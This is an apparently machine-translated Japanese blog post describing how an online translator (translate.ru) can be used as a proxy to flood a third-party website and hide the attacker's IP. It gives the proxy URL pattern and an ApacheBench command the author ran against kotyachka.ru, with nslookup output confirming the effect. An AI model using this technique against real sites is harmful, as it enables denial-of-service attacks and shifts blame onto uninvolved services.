前文
今日、世界的なネットワークは飛躍的に成長しています。 それに伴い、HTTPプロトコルに基づいて互いに統合するWebアプリケーションの数が増えています。 しかし、そのような統合は本当に安全ですか?
最近の出来事を踏まえ、DoSおよびDDoS攻撃に関する情報を検索する過程で、興味深い機会、つまりクロスサイト攻撃に出会いました。 このような攻撃の本質は簡単です-サードパーティのWebサイトへのアクセスを可能にするネットワーク上に無数のサービスがあります。 これらは、オンライン翻訳者、画像ホスティングなど、その他です。 また、広範なインフラストラクチャを持ち、元々大量のトラフィックのために作成された多くの信頼が実証済みのサービスである場合、立派なサーファーだけでなく「悪い叔父」もこれを利用して自分の利益を得ることができます。
実験
このような攻撃の実験は、攻撃されたサイトにアクセスするための直接アドレスを取得できるほとんどすべてのサービスに適用できます。
私の場合、translate.ruはドナーサービスになりました。
検証サービスはkotyachka.ruで、現在は複数の「ユーザー」攻撃と洪水の嵐にさらされています。 実際には、この時点でIPアドレス禁止マシンに簡単にアクセスでき、禁止になったIPに関する情報をメインページで直接表示できるため、これが採用されました。
実験のタスクは次のとおりです-挑発されたウェブサイトkotyachka.ruがtranslate.ru IPサービスを攻撃コンピューターのIPとして受け入れるようにするため。
translate.ruの翻訳結果ページをHTMLで少し検索すると、次の行が見つかりました。
http ://www.translate.ru//url/translation.aspx?direction=er&template=General&autotranslate=on&transliterate=&showvariants=&sourceURL=http://some-url.com
ご覧のように、最後のパラメーターの代わりに、ネットワークで利用可能なサイトを指定できます。
行われたこと:
user ~ # ab -c 100 -n 1000 "http://www.translate.ru//url/translation.aspx?direction=er&template=General&autotranslate=on&transliterate=&showvariants=&sourceURL=http://kotyachka.ru"
「テスト」の終了を待たずに、途中で停止しました。
メインページkotyachka.ruの内容を確認するために残ります。
そして、IP translate.ruと比較してください:
user ~ # nslookup translate.ru
Non-authoritative answer:
Name: translate.ru
Address: 195.131.10.152
ビンゴ!!!
結論
将来、ネットワークが大きくなり、クロスサイトサービスが増えるほど、これらの同じサービスが完全に異常な目的に使用される危険性が大きくなり、「友人」が敵になる可能性があることを推測するのは難しくありません。
そして、同じ画像をホストしているすべてがそれらを作る人の手の曲がり角に依存している場合(サードパーティのサーバーに送信する前にURLをチェックし、グラバーの結果の後に結果ファイルをチェックしないなど)、オンライン翻訳者のためにサイトコンテンツと直接連携するその他のサービスは非常に悲しいものです。
攻撃者にとって、この方法にはプラス点しかありません。 遠くまで行かなくても、DoS攻撃とそのサポートを目的としたボットネットの作成に関する膨大な量の作業が排除され、ボットネットの強力な調整センターは不要であり、「防弾」ホスティングの緊急の必要性はありません...これは原則ではありません。 見通しは非常に明るいです。
警戒してください!